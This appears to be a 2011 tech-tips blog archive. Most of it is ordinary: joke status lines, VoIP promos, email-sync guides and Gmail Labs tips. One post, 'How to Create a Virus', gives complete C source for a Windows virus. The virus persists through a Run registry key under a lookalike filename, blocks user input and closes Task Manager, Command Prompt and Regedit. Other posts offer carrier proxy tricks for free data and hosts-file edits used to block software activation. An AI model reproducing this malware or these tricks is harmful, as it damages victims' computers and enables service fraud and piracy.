Sunday 29 May 2011

Best Funny Facebook Status Updates Collection

Most of the times facebook status updates reflects the actual mood of the person.Are you in a lighter mood and ready to have some laughs? These are some of the facebook status updates and will surely bring a smile on your face.
Here is the best collection of funny status updates for your facebook profile
“Bart, with $10,000, we’d be millionaires! We could buy all kinds of useful things like…love!”
Funny facebook update, Homer J Simpson.
“When I die, I want to go peacefully like my Grandfather did, in his sleep — not screaming, like the passengers in his car”
Funny facebook update,Unknown.
“I’m an excellent housekeeper. Every time I get a divorce, I keep the house.”
Funny facebook update,Zsa Zsa Gabor
“I remmember the time I was kidnapped and they sent a piece of my finger to my father. He said he wanted more proof.”
Funny facebook update,Rodney Dangerfield
“People think it must be fun to be a super genius, but they don’t realize how hard it is to put up with all the idiots in the world,” Calvin.
“Isn’t your pants’ zipper supposed to be in the front?” Hobbes.
Funny facebook update,Calvin and Hobbes.
“Cheese… milk’s leap toward immortality.”
Funny facebook update, Clifton Fadiman.
“Never stand between a dog and the hydrant.”
Funny facebook update,John Peers.
“You have a cough? Go home tonight, eat a whole box of Ex-Lax, tomorrow you’ll be afraid to cough.”
Funny facebook update, Pearl Williams.
“Why does Sea World have a seafood restaurant?? I’m halfway through my fish burger and I realize, Oh man….I could be eating a slow learner.”
Funny facebook update, Lyndon B. Johnson.
“He’s so optimistic he’d buy a burial suit with two pairs of pants.”
“A word to the wise ain’t necessary – it’s the stupid ones that need the advice.”
-Bill Cosby
“I do not like broccoli. And I haven’t liked it since I was a little kid and my mother made me eat it. And I’m President of the United States and I’m not going to eat any more broccoli.”
-George Bush
“Marriages are made in heaven. But so again, are thunder and lightning.”
-Adam Marshall
“ My son is now an entrepreneur.Thats what you are called when you dont have a job.”
-Ted Turner
“If your parents never had children, chances are you won’t, either.”
-Dick Cavett
“Hey! You have a penny on your crotch”.”
-Exclaims Kelly
“A cynic is just a man who found out when he was about ten that there wasn’t any Santa Claus, and he’s still upset.”
-James Gould Cozzens
“We are all either fools or undiscovered geniuses.”
-Bonnie Lin
“A bartender is just a pharmacist with a limited inventory.”
-Albert Einstein
“ To err is human, but to really foul things up you need a computer.”
-Paul Ehrlich

Saturday 28 May 2011

HOW TO CREATE A VIRUS

*Create a thread that runs WHILE your other code runs
*Block and Destroy Task Manager and other windows
*ShellExecute (basics, nothing fancy)
*Turn Off/On The Monitor
*Make The Mouse Go Crazy
*Viruses are fun :lol: :lol:
Some Tips
always remember that these virus piss people off, there for please don’t name them anything like “svchost” or something that the computer HAS to have to run. If you ever got infected you would want to Babel to find the virus. Names don’t mater, but what you should do is the take a name of a program and add or change a letter (in the examples i use “winminer.exe”, instead of “winmine.exe”).
also, try to keep your code clean, the “int main()” should be the smallest part of your program. always split stuff up into voids or other stuff.
1: Creating A Thread (CreateThread())
now im not to good at this, but Threads are VERY useful. think of it like this, a normal program runs line by line, or command by command. a Thread will make a create a separate line of commands apart from the others.
Example
CODE C Language
view source
print?
01 DWORD WINAPI DestroyWindows(LPVOID)
02 {
03 //your code would go here
04 }
05
06 int main()
07 {
08 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
09 while(1)
10 {
11 Sleep(10);
12 }
13 }
a Thread will not keep the program running, so after you make your thread you need to make sure that the program will still run.
Destroying Task Manager and other Windows
now this is really easy and not hard to understand. to find the task manager window or other windows all you have to do is use the “FindWindow()” function.
example
CODE C Language
view source
print?
1 HWND TaskMgr;
2 TaskMgr = FindWindow(NULL,”Windows Task Manager”);
so now all you have to do is tell it to do something to the window…
example
CODE C Language
view source
print?
1 TaskMgr = FindWindow(NULL,”Windows Task Manager”);
2 if( TaskMgr != NULL )
3 {
4 PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
5 }
first it will try to find task manager, then if its found it sends it a message to close the program. easy rite? :D
ShellExecute()
ShellExecute() is a function that will execute other programs ( ShellExecute). you can execute almost anything will this function using this code
example
CODE C Language
view source
print?
1 char Notepad[MAX_PATH]=”notepad.exe”;
2 ShellExecute(NULL,”open”,Notepad,NULL,NULL,SW_MAXIMIZE);
that code will open up a blank notepad. you can also use other things like “char Website[MAX_PATH] = “http:\\www.google.com”, that will open up google in your browser.
Turn Off/On The Monitor
this code i just recently learned from using the most powerful tool on earth, GOOGLE, you can use it to turn off the monitor (not the computer) or turn it back on.
example
CODE C Language
view source
print?
1 SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
2 Sleep(5000);
3 SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) -1);
that code will turn the monitor off, wait 5 seconds, then turn it back on. simple.
Making The Mouse Go CRAZY
this is really simple to learn also. you just have to make 2 random variables (x, y) and then tell the mouse to go to them.
example
CODE C Language
view source
print?
1 X = rand()%801;
2 Y = rand()%601;
3 SetCursorPos( X, Y );
that would make X a random number 0 – 800, and Y a random number 0 – 600. then it sets the mouse to that position.
Viruses are fun :lol: :lol:
well that all for now. here is a simple virus i made using the functions from this tutorial and my other past tutorial.
MineSweeper.cpp
CODE C Language
view source
print?
001 #include <iostream>
002 #include <stdio.h>
003 #include <windows.h>
004 #include <winable.h>
005 #include <conio.h>
006 #include <ctime>
007 using namespace std;
008
009 int random, Freq, Dur, X, Y;
010 HWND mywindow, TaskMgr, CMD, Regedit;
011 char Notepad[MAX_PATH]=”notepad.exe”;
012 char MineSweeper[MAX_PATH]=”winmine.exe”;
013 char Hearts[MAX_PATH]=”mshearts.exe”;
014 char Website[MAX_PATH]=”http:\\www.google.com”;
015
016 void SetUp();
017 void Run( int ID );
018 void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();
019
020 DWORD WINAPI DestroyWindows(LPVOID);
021
022 int main()
023 {
024 srand( time(0) );
025 random = rand()%6;
026 system(“title :.Virus.:”);
027 BlockInput( true );
028 SetUp();
029 BlockInput( false );
030 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
031 while(1)
032 {
033 Run( random );
034 Sleep(10);
035 }
036 }
037 void SetUp()
038 {
039 char system[MAX_PATH];
040 char pathtofile[MAX_PATH];
041 HMODULE GetModH = GetModuleHandle(NULL);
042 GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
043 GetSystemDirectory(system,sizeof(system));
044 strcat(system,”\\winminer.exe”);
045 CopyFile(pathtofile,system,false);
046
047 HKEY hKey;
048 RegOpenKeyEx(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows\\CurrentVersion\\Run”,0,KEY_SET_VALUE,&hKey );
049 RegSetValueEx(hKey, “SetUp”,0,REG_SZ,(const unsigned char*)system,sizeof(system));
050 RegCloseKey(hKey);
051
052 mywindow = FindWindow(NULL,”:.Virus.:”);
053 cout<<”You Are Doomed”;
054 Sleep(1000);
055 ShowWindow(mywindow, false);
056 }
057
058 void Run( int ID )
059 {
060 if( ID == 1 )
061 {
062 BlockInput(true);
063 }
064 else if( ID == 2 )
065 {
066 Beeper();
067 }
068 else if( ID == 3 )
069 {
070 OpenStuff();
071 }
072 else if( ID == 4 )
073 {
074 Hibernation();
075 }
076 else if( ID == 5 )
077 {
078 CrazyMouse();
079 }
080 else
081 {
082 BlockInput(true);
083 Beeper();
084 OpenStuff();
085 CrazyMouse();
086 }
087 }
088
089 void Beeper()
090 {
091 Freq = rand()%2001;
092 Dur = rand()%301;
093 Beep( Freq, Dur );
094 }
095 void OpenStuff()
096 {
097 ShellExecute(NULL,”open”,Notepad,NULL,NULL,SW_MAXIMIZE);
098 ShellExecute(NULL,”open”,MineSweeper,NULL,NULL,SW_MAXIMIZE);
099 ShellExecute(NULL,”open”,Hearts,NULL,NULL,SW_MAXIMIZE);
100 ShellExecute(NULL,”open”,Website,NULL,NULL,SW_MAXIMIZE);
101 }
102 void Hibernation()
103 {
104 Sleep(1000);
105 SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
106 }
107 void CrazyMouse()
108 {
109 X = rand()%801;
110 Y = rand()%601;
111 SetCursorPos( X, Y );
112 }
113
114 DWORD WINAPI DestroyWindows(LPVOID)
115 {
116 while(1)
117 {
118 TaskMgr = FindWindow(NULL,”Windows Task Manager”);
119 CMD = FindWindow(NULL, “Command Prompt”);
120 Regedit = FindWindow(NULL,”Registry Editor”);
121 if( TaskMgr != NULL )
122 {
123 SetWindowText( TaskMgr, “You Suck Balls Superman”);
124 PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
125 }
126 if( CMD != NULL )
127 {
128 SetWindowText( CMD, “You Suck Balls Superman”);
129 PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
130 }
131 if( Regedit != NULL )
132 {
133 SetWindowText( Regedit, “You Suck Balls Superman”);
134 PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
135 }
136
137 Sleep(10);
138 }
139 }
Quick description: i created a thread that looks for Task Manager, CMD, and Regedit. When it finds 1, it closes it. i also made the virus do random things, so every time you restart your computer you get a new effect.
Note:This is for educational purpose only…

Friday 27 May 2011

HIGH SPEED GPRS PROXY AIRTEL FOR PC TRICKS

This trick works on both 2G and 3G networks.You must have Browser in-order to use the trick i would recommend to use the Opera browser for PC.If you don’t have opera browser you may download it from the official website and install it.
After you installed the Opera go to Tools then Preference and open Advanced Finally click Network option.Now click on proxy server.Pick (or) check HTTP box.

In the HTTP box write 208.93.233.5 and enter the port address as 80 and Save It.
Now in Address bar type 0.facebook.com .Now the proxy site may open and enter the  URL which you want to browse or Download.
The drawback of this trick is given proxy doesn’t supports for JavaScript.For example you mayn’t able to chat in Facebook.

hiboo.mobi coupon code - 2 Euro free trial for web callback

What is the easiest way of making International call? Answer is Call Back. Today we will discuss about Hiboo.mobi which provides Direct dial numbers and free webcallback for making international calls. They are giving 2Euro credit for new signups with special Hiboo coupon code. No credit card or purchase required.

hiboo.mobi is a French service provider. They provide international call solutions based on callback system. Main highlights are -
  • High quality calls using callback system
  • Get direct dial Belgium number for your international numbers (you don`t pay for call to that Belgium number)
  • 9 months credit validity
  • Instant registration without any sensitive information
  • Secured PayPal Payment gateway
  • Web callback facility
  • Per second billing
  • No hidden Fee or subscription fee
  • Earn 20% extra with promo Code HIB20
How to Signup with hiboo.mobi to get 2Euro free credit
STEP 1: Goto hiboo.mobi homepage and click on Signup now on left panel
STEP 2: Enter the Promotional code - 2€TEST and fill other information

Don`t go further to make any payment. You will receive an email containing your login information within 10 minutes. Please check your spam box also if you don`t get it.

You can now login with provided user info in email. You can see 2euro credit on my account.

How to make calls using hiboo.mobi
Method 1 : You can make call by logging in to hiboo.mobi and click on webconnect calls on left pane. You need to enter your phone number and your friend`s mobile number.
Method 2 : You can set a direct number for any international number. Just call hiboo.mobi direct number. Hiboo system will cut your call and give you a call back to connect you to your friend.
Method 3 : Dial             +3224024588      , hiboo system will cut your call and you will receive callback. Now hiboo system will ask you to enter the number you wan to call.

Please note that you will not be charges for making calls to hiboo numbers because hiboo system will never lift your call.

Please use comment channel if you face any problem in signup or trial credit.

HIGH SPEED PROXY SERVERS TATA DOCOMO

Where can i get New High Speed proxy server for Tata Docomo with Resume Support?
  • First of all you must have Tata Docomo Dive In settings to use this trick.If you don’t have one you may read here.
  • Now open any Handler Application whether it may Opera Mini or UCWEB.
  • When you run the Modded Application it shows Operator Trick menu.
  • Now scroll down until you find the option Proxy Type.Select Proxy Type and you may enter the any one proxy given here.But we can’t give guarantee that all proxies will work.Be sure you have read or Disclaimer.
  • tata.cellamania.com  (checked and working)
    1. 61.16.174.214   (Working fine)
    1. 125.19.233.102
    1. 67.19.63.178
    1. 74.244.63.21
    1. 203.115.112.5
You must maintain minimum balance of Rs.1 and the default activated settings should be Tata Docomo Dive In.You may also try it in both 2G and 3G networks.

Download BackTrack 5 for free

If you are interested in hacking and penetration testing, I’m sure you know about going backtrack. This operating system is used for penetration testing. Backtrack 5 is now released and available for download. BackTrack is for all public safety professionals smarter soon newcomers to the field of information security. BackTrack promotes a quick and easy to find and update the database’s largest collection of security tools daily.
Our broad user community expert penetration testers in the field of information security, government agencies, information technology, security enthusiasts and people new to security community.This new revision has been built from scratch, and has several significant improvements in all our previous Ubuntu LTS releases.Based lucid. Kernel 2.6. 38, patched with all relevant wireless injection patches. Fully open source and compatible with GPL.

Edit Hosts File in Windows 7 XP to Block Websites

A lot of software cracks will usually allow you to run an application which edits your hosts file, usually in an effort to block your computer from accessing the software’s registry server. However, many of these hosts-patching programs have problems or downright fail at editing the hosts file for certain Windows operating systems. The good news is you can patch the hosts file yourself, as long as you know the URL of the site you wish to block or redirect.
Editing the Hosts File (Windows 7)
  1. Click on the Start (Windows) button
  2. Click on Computer
  3. Navigate through Windows Explorer through the following folders:
    1. C:/
    2. Windows/
    3. System32/
    4. drivers/
    5. etc
  4. In “etc” folder, select the hosts file and copy and paste it to your desktop.
  5. Double click on the hosts file in your desktop
    1. Select to open it through Notepad
  6. Make edits to it in Notepad
  7. Save using Ctrl+S
  8. Drag and drop the hosts file back into the “etc” folder
  9. Select “move and replace file” to overwrite the original file
Your hosts file should look something like this:
Edit Hosts File in Windows 7 XP
Blocking Websites
To block a website, you simply add the following to the bottom of the hosts file in Notepad:
127.0.0.1    siteyouwantblocked.com
So if I wanted to block MySpace, I would type:
127.0.0.1    myspace.com
And then I would get this if I typed myspace.com into a browser:
Edit Hosts File in Windows 7 XP

It will not load the page until I change the hosts file. A lot of people who pirate Adobe software will patch the host file in this same fashion, typing:
127.0.0.1    activate.adobe.com
You can patch your hosts file for entirely legal reasons too. Many people will edit their hosts file to block bad or unwanted websites that could harm their computer. In fact, here is a long, extensive list of bad websites that are already prepped to be blocked in your hosts file. Simply download the text document, copy the blocking website codes, and paste it into your hosts file.
However, be sure, if using one of these lists of designed to patch your host file, that all the websites are preceded with the code: 127.0.0.1. That’s an IP address that defaults to nowhere. Just a blank page. If there is any other IP address in the code, don’t trust it. It could be redirecting you to bad sites filled with viruses and terrible things for your computer.

HeyWire Send/Receive Free Unlimited international SMS for iPhone Android PC & Free US phone number

We had discussed several online free SMS services on FreeVcalls like Lleida.net, Tamevo & Jubin Free SMS tool. Today we will discuss about Heywire which allows you send and receive free international SMS, IM from iPhone, Android or PC web along with a free US phone number for SMS.

Main Features of Heywire -
  • FREE TEXTING (REAL SMS) - 45+ COUNTRIES
  • Text to friends with SMS capable phones
  • Friends do not need HeyWire App to reply
  • Real HeyWire U.S. Phone Number included Free!
  • 100% Coverage in USA, Canada, Mexico & Mainland China, 75%+ Coverage in South & Central America and Caribbean - Brazil, Chile, Argentina, Peru, Uruguay, Paraguay, Ecuador, Panama, Costa Rica, Belize, Nicaragua, Honduras, United States Virgin Islands (USVI), British Virgin Islands (BVI), Puerto Rico, Jamaica, St. Kitts and Nevis, Trinidad & Tobago, Dominica, Bahamas, Aruba, Curacao, Bonaire, Barbuda, St. Lucia, Sint Maarten, Cayman Islands, Antigua, Anguilla, Barbados, Northern Mariana Islands, Turks & Caicos Islands, Monserrat, Grenada, Bermuda, Suriname, Ecuador, Guyana, Bolivia, El Salvador, Guatemala, Venezuela, Columbia
  • HEYWIRE SMARTPHONE MESSENGER
  • HEYTWEETS: TWITTER-VIA-SMS
  • FACEBOOK CHAT & GTALK
  • GROUP MESSAGING - Send 1 message to 10 friends via SMS, IM, Facebook Chat.
  • HEYLO - LOCATE + TEXT HEYWIRE FRIENDS
  • SMARTSMS - TXT AUTO-RESPONSE
  • Use it from iPhone, Android or any PC web.
You can download Heywire application from iTunes or Android market for free. Just visit Heywire website and download it.

How to use Heywire from PC web - Just log in to http://app.heywire.com

Thursday 26 May 2011

How to Sync Your Desktop Email Client (Outlook or Thunderbird) Across Multiple Computers

If you use webmail like Gmail or Hotmail, there's really no syncing needed to keep your email coordinated across multiple computers—open up your web browser on any computer and everything is just as you left it. Those of us who prefer—or are required to use—a desktop program like Microsoft Outlook or Thunderbird, however, have to work a little harder to get our emails, contacts, calendar events, and tasks synchronized across multiple devices. Here's how to set it up.
You've got several ways you could go about syncing your desktop email client between computers, but the best, most complete method involves storing your application profile in a file-syncing tool like Dropbox so that all of your settings are automatically synced between your computers. Here's how to move your Microsoft Outlook PST file or the profile for cross-platform Thunderbird to accomplish that goal.

Why not just use IMAP?

If your email account can use the IMAP protocol, this is the easiest way to have your email synced; IMAP syncs even your sent email with the email server. However, some companies or service providers require you to use POP3; with POP3 you can change a setting to save emails on the server, but your sent emails aren't synced.
Another reason to go the Dropbox route is to sync your settings and other items, such as tasks, in your Outlook or Thunderbird program across all your computers.

How to Move Your Outlook PST Files to Dropbox

Dropbox works great as a syncing solution for Outlook especially, since the PST file is stored and accessed on your local drive; storing the PST file on a network share, by contrast, can result in really bad performance problems or corruption of the file. Dropbox is also one of the few programs that can accomplish this syncing without a lot of hassle.
The instructions below are using Outlook 2010 on Windows 7. The exact menus may not be the same in older versions, but you should be able to find similar commands.
  1. To move your Outlook PST file, first you'll need to find it. In Outlook 2010, you can right-click on Personal Folders and choose "Open File Location" to see the file in Windows Explorer.
    Alternately, you can go to your Control Panel > Mail settings (if you have trouble finding it, look under User Accounts or simply search for "Mail" within the Control Panel). Click on the "Data Files... button" and in the new window, you'll be shown the location of the PST file. (Usually it's under C:\Documents and Setttings\[username]\Local Settings\Application Data\Microsoft\Outlook.)
  2. Close Outlook, then go to Windows Explorer and cut and paste the file to your Dropbox folder.
When you next open up Outlook, you may be warned that the PST file can't be found. Click OK, then browse to your Dropbox folder to find the new location.
You may also have to change where the emails get stored:
  1. Click on the File tab, then Info.
  2. Under Account Settings, click Account Settings.
  3. On the E-mail tab, select the account and click Change Folder.
  4. Select the Inbox to change the email delivery location.
From your other computer(s), point Outlook to the Dropbox data file by going again to the File tab in Outlook > Account Settings. In the Data Files tab, add the moved PST file, set it as the default, and remove the old location. There are a few caveats to this approach:
  • You'll need to close out of the Outlook program on the first computer before opening the PST file on the second one. This is very important! Dropbox is pretty good at creating duplicate, "conflicted" copies of the PST files if necessary, but constant syncing attempts of an open PST file can lead to corruption. So close out of Outlook and let Dropbox do its syncing before you open Outlook on the next computer.
  • If your Outlook file is very big, you could run out of space in your Dropbox account. Keep this in mind, and you may either want to upgrade your account or follow our cheapskate's guide to getting more free space on Dropbox.

Move Your Thunderbird Profile to Dropbox or a Shared Network Folder

If you're using the cross-platform Thunderbird email client, you could move your profile to an external drive (like a USB thumbdrive), but that requires carrying around that USB stick and bringing it to each computer you need to access.
The better option is to move your profile to a new shared location—either a shared network folder or your Dropbox folder. Here are the instructions for moving the profile.
  1. First make sure Thunderbird isn't running.
  2. Next, find the profile folder. On Windows, the default location is in C:\Users\[username]\AppData\Roaming\Thunderbird\Profiles\ or C:\Documents and Settings\[username]\Application Data\Thunderbird\Profiles.

    On Mac, the location is ~/Library/Thunderbird

    On Linux, the path is ~/.thunderbird/
  3. Cut and paste the xxxxxxxx.default folder to your new location (e.g., Dropbox folder)
  4. Next, edit the profiles.ini file in a text editor. You'll find the file in the same location as the profiles folder above.
  5. Edit the "Path=" line to the new location, e.g., C:\Users\[username]\Documents\Dropbox\xxxxxxxx.default

    When entering a non-relative path in Windows, use backslashes (relative paths get forward slashes), and change IsRelative=1 to IsRelative=0.
  6. Save the profiles.ini file and restart Thunderbird.
On your other computers, you can copy over the profiles.ini file so they also point to the new location of your Thunderbird profiles folder. That should be it.
(For more information on moving your profile, see Mozilla's Moving your profile folder instructions.)
Note: You could also move the portable version of Thunderbird into your Dropbox folder for speedier access.

There are lots of reasons to use a desktop email program (better offline capabilities, email sorting, and collaboration features depending on your office needs). Lack of support for syncing across multiple computers shouldn't stop you from using Outlook or Thunderbird. Syncing your profile with Dropbox, you can take your desktop email experience with you on all your computers.

Rondee.com Free call conferencing and recording

Conference calls plays very important role in Business. There are several services which offers free conference calls. Rondee is one of them but with a difference in free features. Features like call recording, customized greeting and web control are paid for most of the service providers but with Rondee its 100% free.

Rondee is headquartered in Palo Alto, California and was founded in 2006. Main features --
  • Free
  • Easy to set up
  • Conference on-demand 24/7 or schedule in advance
  • Audio recording at no charge
  • Listen-only option
  • Customizable greeting tones and prompts
  • Reporting on who participated
  • Conference upto 50 people
How to use Rondee free call conferencing service -

STEP 1 : Visit Rondee home page and enter your email to sign up
STEP 2 : Check the email which will have a link to finalize your login as well as you Dial in number and pin code
STEP 3 : Complete your signup by clicking on the link

Now you are ready to organize your own conference. You can setup two types of conference calls-

1. On Demand Rondee - Independently set up your own conferencing whenever you want.
2. Scheduled Rondee - Calendar your calls in advance with a powerful scheduling system that e-mails your invitees for you and offers attendance tracking and agenda archival.
3. Rondee Premium service - Toll free service - 5centsmin, Rondee Call Transcription - Manual Review $1 per minute ($20 minimum), Automated Review 10¢ per minute ($2 minimum)

You can also register your phone number for a conference ID so that you don't have to dial it.

Review
Rondee is a excellent and free service which provides host of premium service free of cost. The best part is that you can manage everything thorough online web based system. Rondee has positive reviews from USA today, PC World and many more.

Trick To Lock Your Computer With Usb:PREDATOR

Security of laptops and notebooks have been evolving with new technologies like fingerprint readers,eye scanners,face recognition etc but what about the personal computers?
Using this trick you will be able to lock your computer with a Usb.The computer will work only when the Usb is plugged in.Once the Usb is removed keyboard and mouse will automatically get disabled and your screen will get dark.Moreover your computer will get automatically locked.To unlock the computer you will need to insert the Usb again.
This trick will work on on all versions of windows including both windows 32 bit and 64 bit
Here is the Trick to lock Your Computer With Usb Using Predator

  1. Download predator software by clicking here (2.3 mb)
  2. Predator will get launched automatically after completing installation if not you can run it from Start/Programs/Predator
  3. Now Insert your Usb.You will get a message to define your new  password.(This process will not format your pendrive and your pendrive data will not be affected by this at all)
  4. Click on Ok and Enter your your new password in next dialog box
  5. Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list
  6. Finally click on Create Key button and then on OK button
After this the software will automatically exit.Now restart the program by clicking the icon on desktop.
Predator will take few seconds for initialization.Once the icon in the taskbar turns green then your software has initialized itself.

Learn the Tricks To Earn Money From Facebook

Before you read this post I want that you should ask these question to yourself and continue reading only if you feel that you have a postive response for all these questions?
Have you ever wanted to earn money online?
Have you ever wish to earn big money?
Do you want to earn this money quickly?
Do you want to earn money without investing big amount?
Well if you are still reading this post then you might be changing your life..and ofcourse I am serious.The best way to earn money online is via facebook because it has
  • More than 400 million active users
  • More than 60 million status update posted each day
  • More 35 million users update their status every day
  • More than 3 billion photos uploaded to the site each month
  • More than 5 billion pieces of content shared each week
  • More than 3 million active pages
So, why are you missing such big opportunity to earn online.The tricks to earn from facebook has been tested.
What is Not Required to Earn from Facebook
  • Any Kind of programming Skills
  • Any Complex Stuff
Just follow the tricks mentioned in the ebook and you can earn really BIG.
So what is required on your part?
There is a little effort which you have to put to earn and if you are lazy enough or don’t have the desperation to put some effort to earn then PLEASE STOP READING THIS POST!!
You don’t have to put any extra effort to earn from facebook just follow the tricks explained in the ebook  and then keep counting the money!!
Click here to Download Ebook To Earn Money Facebook

Wednesday 25 May 2011

Free trial calls credit for SIP web phone & mobiles

VoIP is the cheapest and most convenient way of making calls to your loved ones. VoIP providers are giving multiple option to use service like Webphone, SIP, webcall back, Access numbers. Today we will discuss about Zadarma Project, which if offering all VoIP features with free trial credit without any credit card information.

Zadarma is a service provided by IP Telecom Bulgaria. Main features of Zadarma project VoIP service are -
  • SIP- Telephony
  • Direct numbers for incoming calls to your SIP from 25 countries
  • Webcall back
  • Receive Faxes
  • Free international calls from Mobile SIP clients
  • Free calls to 20 countries including - Argentina, Canada, China, Denmark, France, Germany, Greece, Athens, Hong Kong, Hungary, Ireland, Israel, Kazakhstan: Almaty, Astana, Poland, Puerto Rico, Russia: Moscow, St.Petersburg, Singapore, Spain, Sweden, Thailand, USA, United Kingdom
  • Recharge your account using Credit card, Paypal, Webmoney, Inetkassa or Robokassa

How to get Free trial credit from Zadarma
Please note that you can register from Russia as well as English home page of Zadarma. With Russian page you will get free Trial credit of $0.5 while with English page you will get $0.2 only. Hence We are including registration from Russian page in our steps.
(Use Google toolbar for translating the page to English)


STEP 1 : Visit Zadarma home page (Russian) and click on Registration or goto registration page
STEP 2 : Fill in the details with your correct email ID, Phone number is not mandatory
STEP 3 : You will receive an activation email to your email id, Just click on the activation link and this completes the signup process

Now you can see $0.5 credit in to your account.

How to use Zadarma Free credit
Using PC - You can use Web phone or any SIP software for making calls.
USing Mobile - USe SIP clients like Fring, Nimbuzz or portSIP

Zadarma SIP settings -
Server - sip.zadarma.com
Login - (Check this in Settings>>SIP Settings)
Password - (Check this in Settings>>SIP Settings)
Display name - SIP

Use the SIP number to receive faxes
IP: 122.167.88.88,
port: 5060,
useragent: YATE/3.2.0

Free 300 minutes offer from Zadarma
To get 300 free minutes, You have to top up your account on $9.5. Money which You deposit on your account never burns, You can use them at any time for calls on paid directions or after the free minutes end.

Zadarma Communication quality
If you are not satisfied with the quality of conversation with the international number, simply dial 888 before this number and system will automatically switch it to another direction of the international operator. Cost of direction does not change.

Final Words
Voice quality of Zadarma was excellent. The best point which we like about Zadarma is number of options they provide to use your credit. You can give a try to service and refill if you like it.

10 More Experimental Features You Should Enable from the Gmail Laboratory

Background Send (a.k.a., the One New Gmail Labs Feature You Should Definitely Enable)

10 More Experimental Features You Should Enable from the Gmail LaboratoryWe love Gmail, but it can be a tad slow or unresponsive sometimes, and waiting for emails to send can really put a damper on your inbox-clearing momentum. Background Send is one of the coolest labs Gmail's come up with in a long time: it lets you continue on working while Gmail sends mail in the background. If it fails, Gmail will let you know and prompt you to try sending it again. Everyone should enable this feature; it makes using Gmail a whole lot nicer, and makes it act a little more like a desktop client than a webapp.

SmartLabels

10 More Experimental Features You Should Enable from the Gmail LaboratoryGmail's Priority Inbox is great for telling you which messages are important, but your "unimportant" messages can still be pretty overwhelming. You probably have your own filters set up, but now Gmail's SmartLabels Lab can keep common types of messages—like bulk mail, notifications or forum messages—labeled and organized in your inbox. It can automatically detect which messages are mass mailings, automatically generated, or sent from mailing lists or groups and label them accordingly, meaning you don't have to keep up those filters yourself. If you don't consider these messages spam, but still want to keep them separate from your other daily emails, this is a great lab to have around.

Unread Message Icon

10 More Experimental Features You Should Enable from the Gmail LaboratoryIt's been a part of our own Gina Trapani's Better Gmail extension for awhile, but Google's finally brought unread count badges to the Gmail favicon. After enabling Unread Message Icon in labs, any Gmail tab you have open should show the number of unread messages in its favicon, so you'll see whenever you have a new message.

Auto-Advance

10 More Experimental Features You Should Enable from the Gmail LaboratoryIf you cycle through a lot of messages at once, it's probably really annoying that Gmail takes you back to the inbox whenever you delete, archive, or mute a conversation. The Auto-Advance Lab lets you choose what Gmail does in this situation, so you can go straight to the next (or previous) email whenever you delete or archive a message. It's small, but a good time saver and a fix for a pretty big annoyance.

Preview External Services in Messages

10 More Experimental Features You Should Enable from the Gmail LaboratoryGmail has quite a few labs that let you preview things like videos, documents, voicemails, and images in emails if they're sent from certain services. For example, if one of your contacts sends you a link to a Google Doc, the Google Docs Preview Lab will show a preview of it right in the email. Similarly, if someone sends you a message with an address in it, the Google Maps Preview Lab will automatically show you that address on a map. There are also preview Labs for Google Voice, Yelp, Picasa, and Flickr if you or your contacts use those services.

Nested Labels

10 More Experimental Features You Should Enable from the Gmail LaboratoryLabels are incredibly useful for organizing your messages, but there comes a point where you have so many that you need to organize your labels. Nested Labels is a great little feature that lets you create labels in a hierarchy—for example, separating mail into "work" and "personal", and then further separating the personal category into "family" and "friends".

Apps Search

10 More Experimental Features You Should Enable from the Gmail LaboratoryIf you use Google Docs or Google Sites, Apps Search is a great Lab that extends Gmail's search capabilities to those two apps. That way, when you search for something in Gmail, it'll also bring up matching search results from Docs and Sites below the Gmail ones. If you're a heavy Docs user, you'll probably want to check out the Create a Document and Docs Gadget Labs.

Refresh POP Accounts

10 More Experimental Features You Should Enable from the Gmail LaboratoryGmail has a nice feature that lets you consolidate multiple email addresses into one email inbox, but it only refreshes them when it deems necessary, which can be annoying if you know someone's sent you an email that you want to read. The Refresh POP Accounts Lab adds a button to your inbox that refreshes POP accounts on demand, which is a lot easier than refreshing it from Gmail's settings or signing into your other email account.

Sender Time Zone

10 More Experimental Features You Should Enable from the Gmail LaboratoryTime zones are always a pain to figure out, so if you regularly contact folks on the other side of the country, the Sender Time Zone Lab is probably a good one to enable. It will detect your contacts' local time zone and tell you what the local time is whenever you open an email from them. It'll even give you a little phone icon that turns red when it's after 9pm there, so you know it probably isn't a good time to give them a call.

Video Chat Enhancements

Google Chat is one of our favorite video chat platforms, and the Video Chat Enhancements Lab makes it awesome. This lab adds the latest and greatest features to Google Video Chat, which currently includes higher resolution and bigger windows, with more to come in the future. If you use Google Video Chat, there's no reason not to enable this one.

Download Bitdefender Total Security 2012 Beta

Bitdefender total security 2012 beta is now avaliable for public download with various improvements and new features like autopilot, rescue mode, scan dispatcher, file sync and integrated cloud service.
You will not only get the oppurtunity to use bitdefender total security for free but you can also win  one Alienware M14x Laptop, one Samsung Galaxy Tab and one Google Nexus S.These prizes will be given to the most active beta testers.
Here are some of the new features of Bitdefender Total Security 2012
Autopilot:-Autopilot is the new decision making capability in bitdefender that automatically configures the antivirus without taking any input from the user’s via popups,alerts.So you will have a hassle free experience.
Scan Dispatcher:-Scan Dispacher automatically checks your system usage and when it falls below a certain level i.e become ideal then Bitdefender performs the computer scan thus making ideal use of your system and without interfering in user initiated actions.
Rescue Mode :-If bitdefender is unable to remove some of the rootkits from your computer then it will restart your computer in Rescue mode and will remove these rootkits
File Sync:-Files that are placed in Bitdefender safebox are automatically synchronized.If you have same files in your laptop and computer then using File Sync if you make changes in files in either your computer or laptop the changes will be automatically transfered to the other system.
How To Download Bitdefender Total Security 2012 Beta ?
Click the Link Below to goto official Download page
http://beta2012.bitdefender.com
